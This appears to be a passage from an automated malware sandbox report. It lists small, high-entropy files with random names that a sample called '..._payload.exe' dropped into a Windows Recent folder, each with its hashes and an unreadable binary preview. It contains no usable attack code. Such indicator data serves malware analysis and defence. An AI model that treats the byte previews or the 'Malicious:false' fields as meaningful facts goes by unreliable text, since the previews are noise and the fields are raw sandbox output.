                                                                                                                                                                      SSDEEP:24:t/7/uHJ87ptT2pJQEKtcx5xFWm2WKDLdsEmxtERju0+J6a3mQJk49iZo2bD:tAwpB2pJRgcxx2WguxR0+8oJHgbD
                                                                                                                                                                      MD5:8E5E21FD41E7BA4B9D47A82EB30A89E6
                                                                                                                                                                      SHA1:29064920E57AF8746EA62A75E746241F59E5A9A6
                                                                                                                                                                      SHA-256:236648FFC8A42779177A66FF8FB7AD4BC335588358013C7259E82C6AB12400F7
                                                                                                                                                                      SHA-512:24F89B0557F97F1C5FFCA55A480D0756AE4C7B3BC41723B8FB0876A57E692F364C04581D6E2AB8FA53A402E120FAA68541B7FCD91FA360BF9F67CF130C3687E6
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:ONBQC|.#..o.......".}.=.]..~...j..g.a.D.?.h.........i...-...m.,s...f.=...e..q..0N.P.NwR..%.......D1s8w....4..g.fo..;..x..y.:.Ru..N...-.Vx......`......V......%.X.:."J&...E..S`QB...X."....D.!v...N...;y,).B...C$3.m.9\8.o...Q&[.c.F.X..[4x....V;..x...!.1K.,.5.g..Tq/...l.Pn]W..q.V.hd...(K.....r{.....Dy...S...%..;....a....I..#.0/.]PJ:.y.[..:.B..z._.E....S6H.(s]..B.I...L..5k.6.=qP..GBGD.......cC..........o?9.*.T...f:..1....".hs..t.....`z/6%.e................hqm.....^n.y*.[.;.......<....mi.@R......9.......P....z.li/m*....o.dl..v..J.F.Y....+k.&...Yi....L.1..r.|P...z(.dx...Ub....]....9....<a(..d..?...Og..p.....P.h..[.T*(.)<[B..v4.B>........qKEC....fr......ewb.r.G.\0.;.4...xr..G..e..Y..{.E...N.+....^.!4.......s.JH.|...jmW.$=..d...!.6j..9..@....Q.w...-....H?.q%..._Q9.].h+6..J..".Q...}KctMM'...j...*.)..b^.s...&.7.t.Pp.....i.{`..1..).'.Q.....^/.$..yw......(..%..^.e...a..kF...`h..s\`&>./[...)R".,......[.B.ib.F\}...k...n..-.....8X.........G#..

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ONBQCLYSPU.xlsx

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.864082161845112
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:EE6eZiFAV7XaQ6vY1Li9HV+MW7D1I6Q+/tfKJEr8Q3J1o5HNsr4IOy0A42bD:96S0AVD56AFiPGU+lCM8Q5Mtsr3OBwD
                                                                                                                                                                      MD5:7789A15A31BE11F35C482D968C9689E8
                                                                                                                                                                      SHA1:CD1A284C3D5F4B37758978AF0EEF8C47D621D546
                                                                                                                                                                      SHA-256:13C5E2C01A81F378B0D260D9E91759D314F9A00E69D72B8A7DEB904DB3574C9E
                                                                                                                                                                      SHA-512:93DC3BF145A36286EB147683853CAECF4B1EEA3A0C4047D7EC8D22F9C1CF664150C7C02025105521E534A4E86E60DBAB48AA1EE2BF5E6120741C16995C101659
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:ONBQC.6...=...U.H....k.+.y4...F.o....yR..J.x.L.......4......m9.m..!..Q..Q=}/.*U.-8j.v.]lX...$]..".S.....D>n......h.0...D.....0.9..GL]O.&...3v\.=.*.R.F.{....^7..c>......0.}.E@...z...p#..\=..+-.........R.v...V.WY.......(...t..l._.[.._.H.Jx.........Z...^+Yk.>......d..R.Z.".O.?.+....E.58u.Pm~..<...j..h.)....._.T..m..P.=.p..'..E...i..cv..U$.'..h9.F.gR..f7..9..^:?K...."....:.?.RH.....j.....O....*3P/>r.s5..OF.As....|..e..Y..>=~....<<.HX..w..>^......4~D...7.....#.....Z...<V..E......@C..-.^.D9....A..."..@K.`..C..._7p.. ...DGC..u.i.v.V....a7.!..}Q.......k*.z.#..].vdf.Mr......a..e..Npm.!..+I....3=.#.+Te...O.x.....y:..j\..E=Y.....r...c..>V...|.m.g.o...s...eQ5.!....Mk..._..;.p.d.4.f)3.b...=../E.*ktPo!s...kAX.~r....T|.....+Jq....$...4D..e....X....\.......Q7ARQ....eyxV.....@....... c.y.Y.(;......H.........A....=....E..Z..r.!V..\.%'H.!.T>.{..C..@....nu..B..?{.].3r.1.....<#.........@m.K\..*....'..n.+..u...,.>....:M.;\.k.Tu....9"..$...d.F. T.JK...r2...

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PIVFAGEAAV.docx

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.835585720556146
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:o2L2BWc9vkApvJ46rJGLmupsQWNm/OcWEs3pHC+VuOQmqnH2Pezfp3nVhC2bD:oc2/7pvJ4eJKs/wzURC+VOXoezfp3nVv
                                                                                                                                                                      MD5:AA1A49A634D8C55DFD0F79184EFA89F0
                                                                                                                                                                      SHA1:D573B87CFA9E5931E7A0592CFAE6335AE25BD1FC
                                                                                                                                                                      SHA-256:4F698C7EB400EC6E77CC8BB4B42DFF6DDD6EE5FBEB36F332C49EC55706BD4966
                                                                                                                                                                      SHA-512:30A970E4D10913602DA19E3F09796143F86B01FB329D00C70AA7BCB5FD47EB461104A08CB6EA7EA46DB2B5AB6E5776076452B1455AC63FE5A6B05C1E22B5F7A1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:PIVFA...1.....Th..q>.E3:.(.. (]._6.......ZD........K...lu....e..".z..~...2Gu<9..R.DD...pf.:..P....BQo..>._..:......S..c`N.M.....;...?......P..[..-...5..+}..."&.n.O..A..M.^..BVU..l.e...."$..B...I..w!..uT.z5....j......zy..z...B....A..O|3,.1..?.g...yq.&.@..p.|..c.....hd.1.i.s.@u..m$..........h&..B.M.s......8.~b.n...i....tO.Oq.z......8......L..iy.[. E......i.A.....~.&...I.v/..u24_...H.F.1=;D...y.8.fl#..b...GJJ.....Fh.S...Q...."xV,.uW.-..fY.4.....&...t.P.).....|x....@.....4.."./.h.bX......n..C.6.....$.1....|.U...3R...w...y..|=s....v/..fp..g..e..Lz.=..D*.p..c.I..8.8.y.I.c...8C.9..".8...g.q.LfH..G.'&@#O.8..Om.g.D....1....i%..]...T9..........9.&./Ka.I6./..m..Z.Q.,\...hII..@....7...n.hdE...Ki.....T..../....Fo...w'.,.....w._.Y/..V9..HX+.m.`.`r.._a.cM...;k...^[.^wuc.m....1I8.S0..#......O}<0..........j......Y....V!&>.......D...A.V...N.]..t....'..}zLpR5.`,1%..vY.).V.....~..;-.#</Y..#15..)....L.[Y4F*..6....5.?...#.Rv..:.*...Q...Ei..Q.......v...XT..ly.NLD..g@._

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PIVFAGEAAV.jpg

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.846575070620486
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:YqZNXMC3lP9YRH54pJhQXjpz1kuMXgm3sh1bwXpQVsDdLeLUbUHTg4x2bD:1ZO+Q/+JhQzc0m3s54QVMhSHE4KD
                                                                                                                                                                      MD5:447D1390BEC2A8EEFF0F5FB612B6C7B6
                                                                                                                                                                      SHA1:A1067DFB957DC052B6F04DF872DDAB8CEEBC678A
                                                                                                                                                                      SHA-256:ABD450DB8B3E2EEC9533B8D3ABC7445FA2183D23401C7E1F709984370014B8B0
                                                                                                                                                                      SHA-512:07050DD2A74DEDB77421890DC966390987EA8698E114EFCE0F0F0C292D76E9BAA86AE54E5757FC4F7F57D96996DA234CB71E58D1625C578B820300CFA33C7E6F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:PIVFA...K{m........)b..T...u!..F.!.$..DcR..E.#x...=........q.....|Q.|...n\.Q...y..z..."vyr. ._.*q......L8{6...d.Pxia...@.W<......Z,..........n9VZ......-. ....At.r...C.g.J.....Z...8.L.d....a..z.....K.B.i..PE....c.Zw`?ry..@..oC..l....Y'mT..AQ.....q.....Y.K.zY.&d>.-..5.y(......r..Y.8..:.*....N.uk.8.29(.jM...~.WB....K.0...........+.fx..MJ.L.,.o..H.A.f.ah.M.3.ca0.@..A.7._a.J|0.........$p@... ..3.{H.%1<.].H.z.Hi.CNa..`.....(.;.].J5..J.VBO.l.o..G...Ot.tT@...f.Er...K. .....!.N...<...h*.3..`h.:\E.............V...S*w.^.;.E..w..LIX.@(..m.Z.(.x|.._.@......4G.v....z....sV...p..d2:!...[...-.E/Y..... ..#* z{t....,J%.].:.._l.#\3&.a.!t........wV5+e^.y..=..oFQ....Z.t..........CoK...Z.cpp..".(N.!J..U...X?.7.~%......&~A..c/..[y..H..:.rJ...O.w.....]..9f........IY.....t.)...pK9.v...=.?.3N"..oQ9.x.2....6-E...Tk.e..._GM.Mh..s<O...].........8I.....'4.U..u1.bl.._g.)h..9.).....&PE......."N.l.r...X..!$.....]..+BY8.....^S u.+q...E...IfJX......#..h.maPu......mt.....

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PIVFAGEAAV.xlsx

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.835778456318958
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:t/tENJ2CXvd+1Ue7j7o+AAYbt7YQl7gckS6YsDTKQQZ7Q2kJQIM6rjRsGBQcaZ32:xC39E/j7ovAYR7HfkDYsKQi7Q2AQsnzJ
                                                                                                                                                                      MD5:1439AEB8143D82C85165EC21CD9DB98E
                                                                                                                                                                      SHA1:B49BF28EF688027B897251B3E1BF33118505A1EA
                                                                                                                                                                      SHA-256:8F8EA74618C6A1FDD2E379C30652C6F3633CB312C7C32A0782019C3ABFB45794
                                                                                                                                                                      SHA-512:D42842370DEB9F33B1D8AE6643B27A6D0EBD0054ECDC7BF78A34D5F7CCD71A7BBE29813CA8DF821C9BDD0CB034C528B3120323F5D1459C7661DA2B825E766DCA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:PIVFA.-.q....T."...F..R..S.+0..:.$Cs..;. 6..F.0.....fZ.+..........>..7|.y8......N5.M()Z._..\..BM..h.Vg...s%WP.p.........z.......;G.S6Zp.(\..P*.Z.xi...U...6..Wh..B....(W.vU.H.;.G.e. ).p@....G. ........&..G.;I...D.i,.Y...P2=*...h.c.J.....h.?!.........e!CC......L..#H.7.x.,.5N......J..&q.'j.w.3..D....=...4..-.....P..Ru^o7.O.U.&..w%0...J.....p.......Z.'..\@.o.../|`C..o8...}.d'.g#k".W..>|.Y..A.".}.....b$.X..b<`...ms.5.|$.......Q .3.Q].Q.....e.....V.0..4...8u..).._ewc..c.....B...&.XN...)...\...,a{l"..0..5k...v...m..E..........=M.....G,PAv.n..U...U.95..AyD.......A..5g..K\....XOR.b%.^.AT.....m;.F)...`..U.O..CDLn.~.&..3..e..Nv..m#...Z..?.!W....4.5......pR......gv...KIU..e...*$.6.gC...5 .....`..b..J"..Y_f!.'.^MX.....x.)Z.-.....;WCZ{.....J...N<........o.Z.x.;R.\...........Ru.4O..-...'..5*^.'.l{..b......6!...lFB..2<U#.j$...L.0.w..."$,.=...!.....d{W.hXF\f+K)...w.{.jGLP...D._D..........|..w.U.Br.[.....X~.q.1..)....^..u...qU.....\.....b.ju....s6..:n....

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QCOILOQIKC.mp3

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.85305209823438
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:RULdN6CX2ayLSlXgMqADU1PH7mTrKKePa7k6d6kugW4AgKqz4dKXM2bD:6dNL2ayLcgMqA4d9Yb6zqzqKPD
                                                                                                                                                                      MD5:4AA4D901169B2D90A5D0BBB527A0BAB3
                                                                                                                                                                      SHA1:A2EDDFEE483969D8D13AE3C57F2F525CEDC72C88
                                                                                                                                                                      SHA-256:BFF6D4B98B1A94754D4D1C066BDA597EB84268A24FD01211522507EC2DF5BCFB
                                                                                                                                                                      SHA-512:B5B162107FFC215974BDE3AD53AB10DA4040E6983EFA5F2E5805369601B823D3F1838AE2BFB2A7FBA7B0629069F3E4ACC50FFE9CEA1D743108CD99A9D0DB7667
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:QCOIL..S...gJd..ao......".n...\.q.~#......i.*.......C.G.n....`..6.?...8$..r.......\.....7..x....W..1......L.,.|M.c.....Y....H...cNK...o_.{ZRW.......o.D.....4I...M|...I..R.....2.^..>5i../o..o.....K. ..{M...........-....&.jQ.O...5..E...P>...b..)Co......V.l...vBP.[.TVB..#..a.X.....Oe^..x...Y.....{-.+A. +..S.s...5..&.=.0$."@.f.E...R......d....H....ER,.Hr-.1.!...N.,...9..,y..r.3f..D........... ..'$h8.......+.P..}..e.t......'.......Ie..N...G.u.......[.Y.....G..w3.}e.|.....7..5Ad...J..=.O...`.mn...M..\....{.{.<.VH[N.U.r...x]{;....W%d7..{....<..v..q....n..G..|V.?.f....&.........!.......>....H...m.k......N(._$.z...>..U..j.......W.<T3.$..>.4.yV...........t<e.3. D...A....qG.c. 8<.a....P}.#~....p~.A1."...w...9n....t....J....y.O..;j.J.".#l.2.]]...g...O&.`..VxF...{..._.6.Z.p..f.#..{..N6.......@..$C....Wc<a..@...."z.i..S..?....L._.JJr...qc)"...aF.*..)$Z....s...'vn...XZ.X.=.......<* .W..<.....-.s.9....C...P..UY..3"m3 .]..6..V..N.j....[.u.&..j....D..U.

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QCOILOQIKC.pdf

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.8454960629271815
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:UkDj+Y4impnkJsq0Ik6UoVU/FBMw3SX1GWWGXLQ+RCVdICBnq6UBZ2bD:UknD4iQO0IksU/FsGDGk+0VdII+ByD
                                                                                                                                                                      MD5:6E77A87BEF15AE3FC4DF1D81A6A3E2AF
                                                                                                                                                                      SHA1:5002F3AC0117FC4A52C3FA801C4DA5F1AD2D1B5E
                                                                                                                                                                      SHA-256:D59C51C264EA50C3C2ECAE2D0E9783565E5481A4C7D3A5ACF3F06E2307C5D98F
                                                                                                                                                                      SHA-512:ED89BC77F1A92C1AA2F5EA873D58F9D714C12827053E65AF6236E3FF614D4FEB2C1C6D445C31BEA3FC9A6827730908B8A5AA0C29175617A519F547BF987F591E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:QCOIL...QT.~..8O.S[...T..-...;&..I.1D..D....ncT.0?.-.(;...L*...=...zy.f..Ep..B:..Q7.Ui.MV...(......<..EA..!.!..*.*Q.X..8=.&....W..6i.........NF... ...=^....P...Gr:..G.....2...L..50.6.......}...s(..o.^.i4C-ZZdg...M.Bo.mR+../UgBk..J.....3..$.i..h........]r.)....mo...K..9..Q.!j..[L....u.\.B@...)...2X.4...3...vg1.>....X..........q%.;(..!.]i..#..XLi..M.....zi3."....u..t=..X...V.+.)..G7.........Q.........A...4 J...O..-.M....c.b.."...u~...f..h.d....g4....#@]}&Yk. f...B)k..}n.z......fyr..lX.....s!|..r..?6..K.a...8....e...+.F...wf6$M<.........Y....T9G..=....&B.F.fD....am..v.....:..MJ..-..5....X-=V..gcg..3<.."E=..K..|>.S.r......{........QF........&.iN..&.k.9N....'.~wd..s.q.]5.2.......0.h../i.G..ZM..+.........X...$.6".0.-.^8Ev......HJr.2R`..ew.O..n7.h...y.).RR...dsGq.8E.N..?....r.g<...C?..h.k......l..K.......*.....n...=.m(.H.q.!...M.S\..F|...#Q8;<z.tg.j.Q.S.KV...r.h......[./'.|..\..H..y.5}..QUW.t..a..T...8..v.Ns..\....f.../..I59.7vs..Z..k.b...

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QCOILOQIKC.xlsx

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.868884917228763
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:6/Ju9uZLcNbjwSZG2rNlpWuMCn5vNotNljaerCdjpnsEae6y2bD:obwNbjwSZGyDW4nLotNljfrOjpnJKD
                                                                                                                                                                      MD5:61EE33BB9CFA303AA1AE53A3E2A24F3C
                                                                                                                                                                      SHA1:700EBC4B805E2509EF8118253436B84EF678F31C
                                                                                                                                                                      SHA-256:A4D0EE78B41C6DA98C18409A4C2D348592983D871A1DC46D9B770B55C0086782
                                                                                                                                                                      SHA-512:82DF92815F62441123F0DC1C4870952ED782C074D93C9A86FF0F6205E1E10B00C1B36290474757674C28BFD47F64CFD0BD25361BF7DA079147041DA0A7AB3DB8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:QCOIL{.EJR.A.N.C=".W.~..l..n....:..Tf8.....ci.UW..*.QS.i.j.......q.6p.2kF|?.I..VyvG..%.6....h9..K.....@B....p.K.R...}W.,V...@/.}a2.g....P..<.-..[...k...t..Ah..m}.J...w.*.}..!17....9..P..'.X...&..^..!C2OWV..yZ..MD{..<..D..Fo.....kQ..=@.A...^.H{..h...n?k..R.,...{.O3.q..-&ZZ.....;..j@./X&...F..[....O.`...?..X..R3.o......m. 7i;U...^.0.`aF.....Z.......N.........!...JC......5i.V.W....#j..S.&e*.K..r.+.].&...i.h8I1.%........g..J.C.....)..c.=.^....6...jO..i...:.XG.L6Z<.B..uc.S>.<.....r.g>..._.r1......O...U.:1..8.&h.g'...H?'y.u.e...v.......O....o..=A<..y........I.P(...ywl.H....0Y..r.wH3...[.6W.R.....[.K}...D8...5$..Xr.#z..)t.c.U.. %.8...........eC....T.{.rs.....c..C]..d..a...eh!..h........}{.....!k.V.5. >...a.T-mD31....0......N.P.qks....!\.%..QC.I4..[....F...g:.5...Q.u!.q<.3...J.;...fK..@............V.2.a.J........7.......4.....2.......9+).v..P..)gNv..d...O.....%....}.z.j.3MqW..BF..E5....;.jo.Y.....L..N..j..?.%<.v.E .,.d.*U1".=..Q..l!..."..H"............

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\UMMBDNEQBN.docx

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.866824071105435
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:o4dAyFmvVlhhNusOW2oZArQMZD4DT/9Cq6t/VmjC+h/X/gKTcHAWfprRyifoV2bD:o4NgvVrz44erpZEfPCVmeUv/ELpl9flD
                                                                                                                                                                      MD5:615590CF46621F2773DF7E8E3E731A49
                                                                                                                                                                      SHA1:BA225D1A79F88D8B7E28452C9953908E776722C7
                                                                                                                                                                      SHA-256:8FC57EA3FD495883C6FF3A6748B0A4EEAC0598EE150C2FC1AFDD0A152282AD83
                                                                                                                                                                      SHA-512:161D17C348AD6D5ADB343CA941D36E6530575BF22C733DE203C68C63275C3EFE009B45F225E74577CDF22F888DF65D8D9274EC736C9380135F2E6C652EA086A1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:UMMBDq4. ..o...V......d......%...... Hk.Y..._.B..pt...'..3..p.m.....k@....?....$.#.4. .:.....a.f.._r...........N.BT..@.....@..==...x=..9\t 0.y.LD....D.1..~...n.w.KX ...#L..1...1...]..ht....}V+)..1.N/.u..*..W.P.....5.H\.z...$1f.X...)L.....x.8.pJ.R..b.&.h.1............)..4.Z..)..6Ta...x..z.!9..^/.9$......I.vzf@..W...4x..=>......?>Q.hS._.?...%W......a...:.Y..v$r.h..8....N....IBU.....d.s&)}...r...X.....J=}C....u...kA.>.....Q9.O.}]..-...cb'.<@E.C.tp..X..HP...Hv..r....3...".s...t.}....o.2.....)...F_.m.........O......h...kp..IKP}pi.....W...\q.........)R.2E....s...].*2P^.?.2]."g-$D....aX.*.Z.5^[.m^Z..`.d.G.P..Eg...O..S^..._.-..H...b....p...-....n...6yRz..C]'_..".u..8G%........lPn...F _..l.{F..:..+...k..k...X.n.Hs].8..;.N>... ...)3....Zhd".......O.p?.....wd.......Q6...?h..l...P..=N=&'..L...L.0.b....!.h@4e.....R......k...f..f4n.F...e.x..8.P_.y..\.Fn.6."hQ]...S_....Ri....D:0gL1...&-..[^.'..>.aEc..9.u.1I.....i^.T..wQV...kt%5.l.....#.<.z.Co...Gh

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\UMMBDNEQBN.jpg

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.820319179062237
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:7QYTe/uc2bHw/XIgKbKmtaHhfMRG8IkDLFy7JEWed263D1LxvWSR2bD:bTe/q8Kb1SFLaDLFy7CWed2OzvXqD
                                                                                                                                                                      MD5:F65FE5A7B29535BB3E330CF2E6FAE65D
                                                                                                                                                                      SHA1:CBAA146C4472DFFD73F77E9F18EF7210F90FBA46
                                                                                                                                                                      SHA-256:92CC357BA24ACCFC6F42ADAE42233A5EE2C012657C186D1AA7CF42E01B0EE7E4
                                                                                                                                                                      SHA-512:B7402FC04C3B8F4146C4123E0AAFF9C044D73645FEFD60878DE06DEA9440D8E86675928F4C5C90E51C3088B49BB8F1D93A079B63B02E338D0A626BF28F7E7E0C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:UMMBD..n..=...*..l#..,...F._.1..tY50...\....j.pf...(.H.ex...V..L^.X..c..\a."t..e..$*J.. .nV].LO+.B^..).....j..._..ZI.....C..+D...yr.....i.A%u.#....H.g...`d.8q...K.....X......;.T..&..R....D=.V.~...I....O.{..W[.r$.GHhS...:..~...y....Gl^..)w....4.B...}@B.....=N..'...=.x.=.*\B.B\y.>/i...+..B.H..E..]t....*.u......y..V.s.;"~.em.>..x..S.=..L..w.. ....#..p.k.0Tr.Q...*..-;6....ciS....og.k5..<:..i..1...)p.r_.qL....q....n.l.b....+.}....2.8...]].>N...f.Z.f\....^4...sZEi/]..[o.-[.wE.i...d......<E...$..9._#.......[..C.. ).......2..'..U..B.D...5.QF....px5....B.7.93`9<6..x|C/x#m.....W...T.\.w7.....>.t.).>N...h.~C....g4..@>u*....p...=..-/'......X.NG_...6.*...~v..W.C...`..{t.X...V6...L......S..F.6b.`N+...p.cgv^..Y..0B.ir4..<0.e.H0.-...Tb..H.R.';E.`...J...D.t.K..Y@.....F..m:ed.t..:...p....N....e.4.g.o.-..?.....(l._8wT..0[.....d...i...XC.4.bOV..wq...e.l.g1.r.Hj...l.vA.[....:.r.,.L.P....I.C0...w/...l`.L7B.q.t<....#...6.b...\'...Q..K...p.A.....B..W...."Y?.

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\UMMBDNEQBN.xlsx

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.858439816360195
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:8Qqj9QsSesX3BoqfDYe7utvtgeH1OrYQ5o3DjB5Z+dL7jZS/s2bD:Hqh+BoqNyth1O95ozV5Z+JZS//D
                                                                                                                                                                      MD5:13695FCE0ADD10B7DA745296FDEFF167
                                                                                                                                                                      SHA1:1AC6FD033313498A26B58FBED6673DF50EC60A54
                                                                                                                                                                      SHA-256:A74AE0055C0ABBDDE1181611851326CAAF89897E822AD1EDF2AD3E1D72709B07
                                                                                                                                                                      SHA-512:ED7111BB49F32D2C5D5AABBA068E7310ABCFB4B95BE3FF4EC854CA6A2BFEB8A71F20F2EBC405E7AA8800267CB26F64F4E8C700A18F74D7335B1C0E7ABC8C49F5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:UMMBD..F...mE[.C.t...|M.....{H.E.....Ug.|x.+..S.=G.t"......i5b.().;.n.%.5K..-.,..R,.Q...?.w0.P.O2..Y.*OL..0,.>..j#...f5..~.1.=..,!.Y.k|..I.g.-......[..}z^|>G...`...s.WG.).tLL.vW..t+%....;.Z./...`.....k...>...sZ... ..H..a....M.;Cg..F.K.,;..0.j*...X...Img.M.v.(d..hr,-E..&jLo....J.Xs.+..7@.hB7.N.nx.O.... .#l..k#....D....Ph+.Oz...>.......ee..'v..Y...c/:..W#.MA......z.^.U..x.a...........w..9...'...|eg.n..7d...1....o.i'D..`.2!Wy.u.aDbZ...X.G..M8Y...N_.&....G.G..i.....M..KHE.....b.k"+.............S.kC.O...kI..6..Af..aFR.~...q..:...:.......i..O.9W..Z....._.......n.1.|..4..8..z......5.Y.2.a.......%..SN..'....6....L..z%...J.M.6....^.....%.:.S8..kn.....F.@.....f=.2.Sd;.e..T...=.N.E.8.........1.Kr.....W..-.....Zw!<(....|.3.... ..B..-_>..t%.....K....Y|..y.l...ky9....).,..K..!.; M..1W..J...#.X.D+B.m7.b...y.HR...!.M......r...j..V..DUP..C.W}.i]xn.>....D.......x..*.6u6%.:Q....C.y...]...J(.....!....n|.<..+Q..y..`.I...5.....'....,P.XE.....E3..Z...

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\UOOJJOZIRH.mp3

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.846831790938155
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:TBb5umMApUAtgrWp+cF53yQXcwmBx/H1WBoiCylaX8plfA78eLUpQT6kq2bD:95umLUAeKj3yNLBxgCylaX4fARUpQTlD
                                                                                                                                                                      MD5:C873A0A5B84E3ABD837C88C2077C413B
                                                                                                                                                                      SHA1:8B83CF8A61861293F2386E37574C4C5CD887F776
                                                                                                                                                                      SHA-256:34B9A025CD428EDAF1DBB4C97FFBC39DF9E87477D3C05F7D73DCDE4DFFC16421
                                                                                                                                                                      SHA-512:5A5C8809F6B7B67EB5A7E4A582BEF464C80F3C532DC0BD5398C68915D43B06B32EC1645BA734CF9D6415C7FF922DED692B96594F39CEED4F5E8D55544A3F2B30
                                                                                                                                                                      Malicious:false
